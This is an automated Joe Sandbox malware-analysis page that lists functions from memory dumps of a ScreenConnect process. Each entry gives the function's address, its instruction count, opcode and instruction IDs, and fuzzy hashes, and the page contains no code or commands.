Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d2de61731af2cf3b102799ce053f537bd7037b72325cd87b4d7ea05f07f3b17
Instruction ID: 25def74c8b1c0287779c05056d4f3bfd0783cf84b66d07a679b2d881ffdf7168
Opcode Fuzzy Hash: 9d2de61731af2cf3b102799ce053f537bd7037b72325cd87b4d7ea05f07f3b17
Instruction Fuzzy Hash: AB514F70719A4E8FDFD8DF58C8A4A6633A2FF68314B14066DD81AC72E1DB35E852CB40

Function 00007FFD9B8AE477 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dcac091ce2b89d68fb0828d8b6c2907cd6a09ef89dfd8e10900064e9b3a063d
Instruction ID: 96e8604e8a03a2e660b963145e7f51c558fd3e2509443747398039cd918f21fa
Opcode Fuzzy Hash: 8dcac091ce2b89d68fb0828d8b6c2907cd6a09ef89dfd8e10900064e9b3a063d
Instruction Fuzzy Hash: AE415B32B1DD4A0BEB6CAB9CA4619B573D1EF6835071045BED05EC35DBED25F8024382

Function 00007FFD9B8AE765 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cc89e07b2547fa026ebed9d8e888ba13e63bd036bac5c2e439c2815c7da6b3b
Instruction ID: eecb6cd6cddad1fd1d2899f169426815d8dbc4ef83937fe9f6f500f9cbff7e2b
Opcode Fuzzy Hash: 9cc89e07b2547fa026ebed9d8e888ba13e63bd036bac5c2e439c2815c7da6b3b
Instruction Fuzzy Hash: 76415921F1EA8E4FD766A7A898B15B87BE1EF59200B1904FAD05DC30E7DD286806C342

Function 00007FFD9BBB5379 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e18e17d6a8248c01c6efd72b7d0a4627dcfcdde4afcfe00dbb61a5452a502b5d
Instruction ID: e767a393c78ef631a50ace4261bbb6178a59b2b792b750b88ddc9d61b1a5b5d1
Opcode Fuzzy Hash: e18e17d6a8248c01c6efd72b7d0a4627dcfcdde4afcfe00dbb61a5452a502b5d
Instruction Fuzzy Hash: 9B41B37160DA8D8FDB98CF24C8B4A6637A1FF58308B15059DE45EC72E2CB35E852CB01

Function 00007FFD9BBB12D1 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9afdc03c8745856cbab7b4a425615f19abf025f1e01a19a2ec06c50781f620f
Instruction ID: 21fdcdf111dd55afc7146a67421731655893f175cfddcfe42cb5d265b1cce66b
Opcode Fuzzy Hash: e9afdc03c8745856cbab7b4a425615f19abf025f1e01a19a2ec06c50781f620f
Instruction Fuzzy Hash: 0941E96390F6AA1BD7219A7C94B54EA7B50FF1221871901F7C0988F0F3FD157546CB81

Function 00007FFD9BBB4D65 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 265c3ad1f2653f53ab97b71706f49c5e2ceb5151f25fedf01fa4de7b6ba19740
Instruction ID: 13f1ffb67aab2856cef124c7e7a810d001e459ec36d7ec98b178ce7c71112999
Opcode Fuzzy Hash: 265c3ad1f2653f53ab97b71706f49c5e2ceb5151f25fedf01fa4de7b6ba19740
Instruction Fuzzy Hash: 99313922B0FA9A0FF7A69A7C54A01B56B91FF9535470901FFC488C71E7ED046D4A8741

Function 00007FFD9BBB1395 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd9d1eba4d18117290a185b4628929c243599cf21e8a09bf2c99bfc331d220a3
Instruction ID: c35335cb164ca449b608b279fc01c18a72f155af9e28bade5d53c8cff19fccc6
Opcode Fuzzy Hash: cd9d1eba4d18117290a185b4628929c243599cf21e8a09bf2c99bfc331d220a3
Instruction Fuzzy Hash: B0310B6390F6EA1BE7319A7C94B54EA7F60FF0221871A01F7C4984E4E3E9157945CB81

Function 00007FFD9BBB7F9B Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6b956e501d00f7415bf0ed40133b8644a250d7fc1057cc302411fdbd2c385ee
Instruction ID: 59639746d72281412d6ba7cdfe2cd9b2c6594862c3eef43ac9057e5f2a0cbfb4
Opcode Fuzzy Hash: f6b956e501d00f7415bf0ed40133b8644a250d7fc1057cc302411fdbd2c385ee
Instruction Fuzzy Hash: 70318821B0EA9E0FEB6DABA85C215B677E1FF14384B4400BED05D830D3ED19A9068741

Function 00007FFD9BBB496C Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a26d69a15a4a9a2ed88dbb67a6c63e7d4ffae2ae83caa2d7b930b84771998a
Instruction ID: 054f45163251d360a6259be10050b69d4629b67fed61b048846e44c7e2b033c8
Opcode Fuzzy Hash: 61a26d69a15a4a9a2ed88dbb67a6c63e7d4ffae2ae83caa2d7b930b84771998a
Instruction Fuzzy Hash: A4316511F0E9AA0FE764A7AC486567976D1FF96358B0941FEC088C70E7DD28A8428382

Function 00007FFD9B8AEA78 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e8ce716501d67140863c436f57b086c36a7cfe43619c84bc87310b5e2b91dcf
Instruction ID: 9ec3a27b7beaa2250bbed1473e4e081ddbc78e9fc5952cb49bcecdbece832922
Opcode Fuzzy Hash: 4e8ce716501d67140863c436f57b086c36a7cfe43619c84bc87310b5e2b91dcf
Instruction Fuzzy Hash: ED218611B0EA8E4FD72657AC5C785B13BE1EFAA20175901FAD448C71F2ED08AD46C3A2

Function 00007FFD9BBB83C8 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3416c094e75faa913dfeaf7eab36056612ebffc2547dc6ce42e6d92fde02e8c0
Instruction ID: 2b276cf804c5369db0b4f57de5744520d1af9665a0e9fb67f3b973812795c30f
Opcode Fuzzy Hash: 3416c094e75faa913dfeaf7eab36056612ebffc2547dc6ce42e6d92fde02e8c0
Instruction Fuzzy Hash: 4D31D936F0E95D8AEB68AB959C601AA77A1FF94308F050679E04C831F2DB255902CB41

Function 00007FFD9B8B0005 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c150ef8fb125e93c915345d55e845afa7908b1284be26fef3405002e53164375
Instruction ID: b3f50b0f501576a58451b7290dea513a5797130213213caafe583a595b2716dd
Opcode Fuzzy Hash: c150ef8fb125e93c915345d55e845afa7908b1284be26fef3405002e53164375
Instruction Fuzzy Hash: 1E310831E1AA5D4FEBB4EB6888756B97BE0EF5D300F0504BBD45CC32E2DE2469418781

Function 00007FFD9BBB87EC Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d1fd2c89f6d15e43e40390d463859a965e50423b5dea041026a3629211a6222
Instruction ID: afbdc2c90fcb9e64de019950757ef1f6d73b7ce84639f05934c45db5146075b4
Opcode Fuzzy Hash: 8d1fd2c89f6d15e43e40390d463859a965e50423b5dea041026a3629211a6222
Instruction Fuzzy Hash: D621A333F1ED6D4BEBA596A85C311EA3791FF84348F0505ABE55CD31E1DE25AA008A81

Function 00007FFD9BBB12E7 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22cfdef3b8def17a29a6f1729aa965a41e4a8ececc9aa3db78a3248ea947d8c9
Instruction ID: fb060eec421744a4fa7accaf320c670a9fd16ac7cd2235e9cb36bb84f43a2924
Opcode Fuzzy Hash: 22cfdef3b8def17a29a6f1729aa965a41e4a8ececc9aa3db78a3248ea947d8c9
Instruction Fuzzy Hash: 5831D77390E2665FD716AB7CA8A54D67B60EF0222C71901B7D0998F0B3FD256446CB81

Function 00007FFD9B8AA637 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5cc7da56eca448f068e28d7f4ff4f6fb4e68fe5cc45da43ce2e0c501fff01c9
Instruction ID: fd4c0a31241067db859be704041bc442beed281d8c301a0fc9953d43f8f56ef9
Opcode Fuzzy Hash: d5cc7da56eca448f068e28d7f4ff4f6fb4e68fe5cc45da43ce2e0c501fff01c9
Instruction Fuzzy Hash: E821D731B1DE4E4BEF5CAB689869AA5B3D1FF58744B0041BAD40AC3596ED34E8468780

Function 00007FFD9B8AAA99 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 596247fb5cca557994468d73a240380def78e9a16b63cbf34e0922eff61a4a35
Instruction ID: d9434a822fc77fbc4647e32684776e9918612d4c04b8a50892e32a7e4c32b27f
Opcode Fuzzy Hash: 596247fb5cca557994468d73a240380def78e9a16b63cbf34e0922eff61a4a35
Instruction Fuzzy Hash: 9921CD30A0AA8E4FDB55EFA4C824AE97BE0EF4A210F0501FAE059C31E2DA386941C751

Function 00007FFD9B8AB90D Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f903bd7516e9ae50be0c9b30499af12b3a0a928cd30ebb21bcb7ffd5f3f440
Instruction ID: f1f10099f80e52834b3277c1a0406936e150b8a3828ca6fd459ab0e58659ce23
Opcode Fuzzy Hash: d8f903bd7516e9ae50be0c9b30499af12b3a0a928cd30ebb21bcb7ffd5f3f440
Instruction Fuzzy Hash: 72112312B1EFC90FDB8A9B7C58B55A97BE0EF9921071942FBD018C71E7ED18D8468311

Function 00007FFD9BBB520D Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b7ff7f8c83fefc15c2fb2634f926df55cebeb75385bf4a27255bcbffc705e09
Instruction ID: 7291740699c52dc8bbabf8aecaedcd1e641152a72ed4264fee231334d48e4e48
Opcode Fuzzy Hash: 4b7ff7f8c83fefc15c2fb2634f926df55cebeb75385bf4a27255bcbffc705e09
Instruction Fuzzy Hash: A511A572E0FE4C4FDFA5CB644C711A97BA1FF55304F0505AAE15CD32A2DA21A900CB02

Function 00007FFD9B8ADA24 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 610653ab15f2602fbddd117e5939862926d1176f13f43c4f70250d8c49036210
Instruction ID: 1d293104e43daceeec9245f69876d9a1d21129947228d58e84ad3a451a5ed6f1
Opcode Fuzzy Hash: 610653ab15f2602fbddd117e5939862926d1176f13f43c4f70250d8c49036210
Instruction Fuzzy Hash: DA11B131E0DA4D9FEB58EB9895A56BC7FE0EF48300F4144BAD01CD31A1DEB42A418791

Function 00007FFD9BBB25C0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f025d64fdf619d3a23faac1b07a1cf376465c0723d8e1e7693bb3b81f1bad19
Instruction ID: 1e14dac4046d39f813ebd3c34afcc3ca91fa3e88b4be27089083449a636ebdc8
Opcode Fuzzy Hash: 3f025d64fdf619d3a23faac1b07a1cf376465c0723d8e1e7693bb3b81f1bad19
Instruction Fuzzy Hash: E6119D71B09A4A4FDB98DE58D8A4A797792FFA8704B0501ADD45EC72A2DE21E842CB40

Function 00007FFD9B8AB018 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ada5305eed10b4904b48e5e43f68ac3c9a161c518db7fdaee7f6da77efaca4b
Instruction ID: fedbaef6861be3d70684d544099385170363a2e3404c472ee18a8d7bd5d1074f
Opcode Fuzzy Hash: 3ada5305eed10b4904b48e5e43f68ac3c9a161c518db7fdaee7f6da77efaca4b
Instruction Fuzzy Hash: 19014922B1ED4E0BDAD8A76C78215A4B3C2EBDC320B1403B7E00CC7299ED14DD8247C0

Function 00007FFD9B8AFF8A Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53a351c6eaacde2cddd57c9d57571c3f605082607ea42a3b5ca301a2fcf245c5
Instruction ID: 3258ed4b5d0f6c0d8d67b857054507006deab1b1c7ddfe855ed5f401363cf31b
Opcode Fuzzy Hash: 53a351c6eaacde2cddd57c9d57571c3f605082607ea42a3b5ca301a2fcf245c5
Instruction Fuzzy Hash: AD112963A0FA969FF6A557B844B20747FD0FF6624070C46BBC0E8C19F3DE14A806C250

Function 00007FFD9BBB280C Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fe36e64f0e0a8ed0d17c81cf7aaac90a1366580b2ced54d498e7acc95080fb4
Instruction ID: 09b0c89e2ffe9d47cfd14b79db1dfbf68020fccf0324e1e4a5aac40c18f0cad0
Opcode Fuzzy Hash: 8fe36e64f0e0a8ed0d17c81cf7aaac90a1366580b2ced54d498e7acc95080fb4
Instruction Fuzzy Hash: 3D11B171B09A594FDB98EF58C460B6A77A1FF68304B0541B8C48DCB2D7DE35F9468B80

Function 00007FFD9B8B007C Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d61a28b8595bb2943956547189724bd84b4407330d18e3e2ed000130ac71dbd3
Instruction ID: d7b3ee9fa725c887f478b747b6fdede352f41d7f6bcd611f1492dcd2dd4f4373
Opcode Fuzzy Hash: d61a28b8595bb2943956547189724bd84b4407330d18e3e2ed000130ac71dbd3
Instruction Fuzzy Hash: 0C11E830B2891D8FDF98EB6CD464EB9B3E1FF98301B5100BAD41ED32A5DE25A8018B40

Function 00007FFD9BBB2875 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee9a103ab348b085969e3c0c8721a115a336ba25366840d030847919efb52f16
Instruction ID: 19fd6410ec5a09f3badb8c7ef12f75e3cdb973832d7ed13d9f6e8626f0aec287
Opcode Fuzzy Hash: ee9a103ab348b085969e3c0c8721a115a336ba25366840d030847919efb52f16
Instruction Fuzzy Hash: C311D071709A594FDB98EF58C460B6A77A1FF68304B0540B8C48DCB2D7DE35F9468B80

Function 00007FFD9BBB4709 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3529532652.00007FFD9BBB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9bbb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02929ef9d8fcb2a79e0afcf2b5d15bb6067f520194177cf690d92fc722fb428c
Instruction ID: b66445d4c5b0520071cca447557ccf222ccbd9d30e4b8c68f8abb762d1c3f2a2
Opcode Fuzzy Hash: 02929ef9d8fcb2a79e0afcf2b5d15bb6067f520194177cf690d92fc722fb428c
Instruction Fuzzy Hash: 8211C615F0E66B0BE779926A447037626E1FF86344F1A40BEC44DC61E6DD2C9D81C711

Function 00007FFD9B8ACB78 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e572a05616b29b0d8847d4b8a7f0165d49be26f15df0b7e0ab7b83896ff09eca
Instruction ID: e179769fc5f6a7cb60546524a74486e931057101c26765dc225f4ad3ce46702f
Opcode Fuzzy Hash: e572a05616b29b0d8847d4b8a7f0165d49be26f15df0b7e0ab7b83896ff09eca
Instruction Fuzzy Hash: 7A118270908A8C4FCF45DF6888095ED7BF0EF58310B0102ABE409D7162C7359949CB81

Function 00007FFD9B8B10E2 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5d1b17550a12ba2c50271cc9cbc8b51f4a11f161b52b0d752405ecbaf515e1b
Instruction ID: f258668c2b325bc2c9d96a74f9a80e78f25cd545160f1c3fa42eb431e6cd5ff6
Opcode Fuzzy Hash: a5d1b17550a12ba2c50271cc9cbc8b51f4a11f161b52b0d752405ecbaf515e1b
Instruction Fuzzy Hash: 92014912B2EEDE0FDB99A37C682156477D1EF99210B0942F3D00CCB1D7E918E9424381

Function 00007FFD9B8AAAC0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da15d78c6cb21d37930cd02df653a1943b30dd05e1610641328bc1b30a644f71
Instruction ID: c423e4502c24ee3a10286e653083f9dbafd5a45fb65d912a3a0800529d10ffcb
Opcode Fuzzy Hash: da15d78c6cb21d37930cd02df653a1943b30dd05e1610641328bc1b30a644f71
Instruction Fuzzy Hash: 79011B30A1494E8FDBA8FF68D8256E9B3E1FF58301F4104BAE41DD32D5DE3569508B80

Function 00007FFD9B8ACBB9 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d66f9a18e8937ba767376e96cd612e528c6544ea715935a055fc8e404bfeb31
Instruction ID: 22bd64f4473f6e6b385b7b78e2305c392b8a9f33daaf34a40bb240e39f139bc8
Opcode Fuzzy Hash: 5d66f9a18e8937ba767376e96cd612e528c6544ea715935a055fc8e404bfeb31
Instruction Fuzzy Hash: C0018070909A8D8FCF46DF68C8055E97FF0EF59314B0542ABE40CD7261CB749945CBA2

Function 00007FFD9B8B2125 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f52a52df3f643108051663c1e526f52de6d809843229029f3ddc4adb91f10e2
Instruction ID: d0b58c593bcee52928156c855f261c8f153a4c532d0d0fa5072aad7818630c11
Opcode Fuzzy Hash: 6f52a52df3f643108051663c1e526f52de6d809843229029f3ddc4adb91f10e2
Instruction Fuzzy Hash: 0301F122B0AADD1BE715DBBCA8650ECBFA0EF56200B0500B7C448860A2DD2526868B81

Function 00007FFD9B8B0463 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b459c58685af33d13196140a8b5324a7d1cb69e17ff915fbb1cb776cde68703
Instruction ID: 543f21d7c85311e7be40bf47991d1b1c69ab412a87c8e68ee37a654c605e672a
Opcode Fuzzy Hash: 1b459c58685af33d13196140a8b5324a7d1cb69e17ff915fbb1cb776cde68703
Instruction Fuzzy Hash: A1012652B2CC2E0BE7B8A6AC94A557463C1EBACBA07024276C44DC31A5DD14AC4347C0

Function 00007FFD9B8AB940 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 366bff4e9fdf6a49bee47f61f3c0fc9b9bcfe6bd988b25e4223c74220c79ad86
Instruction ID: 087a28b0d50003ec9ea0c962884481cde0c8e62cc51f635318a265f5df648f44
Opcode Fuzzy Hash: 366bff4e9fdf6a49bee47f61f3c0fc9b9bcfe6bd988b25e4223c74220c79ad86
Instruction Fuzzy Hash: A6F0F921B28D0E0B9B8CEB6C54A59BA73C1EBA822471042B7E41CC32EAFD24D8428341

Function 00007FFD9B8ACC32 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70765739f19cb8a7fd96192e14088e8af9cd127ab25440d727e7945568fac1f9
Instruction ID: 2e1ccc214991aa8e3c73420b831300287e09163b9a4144102a744938472fefd2
Opcode Fuzzy Hash: 70765739f19cb8a7fd96192e14088e8af9cd127ab25440d727e7945568fac1f9
Instruction Fuzzy Hash: 96018F30A5894D4FDB98EF18C858BE973E5FF5C344F04026AD80DD7295EA26ED82CB80

Function 00007FFD9B8AA587 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.3518466457.00007FFD9B8AA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8AA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd9b8aa000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a1abb766a70cc3d944b229f55d5d44f06d885e6c08152fe0da62c0e3c03e751
Instruction ID: 7a3052ffbe0a2c922db10e9312976e015da95a58cd48f3b4a481ba29dbd7c3d2
Opcode Fuzzy Hash: 8a1abb766a70cc3d944b229f55d5d44f06d885e6c08152fe0da62c0e3c03e751
Instruction Fuzzy Hash: FA015E31718E4E8FDFD4DF68C4A066533E2FF69304B1546A8D41EC7296DA31E842CB40

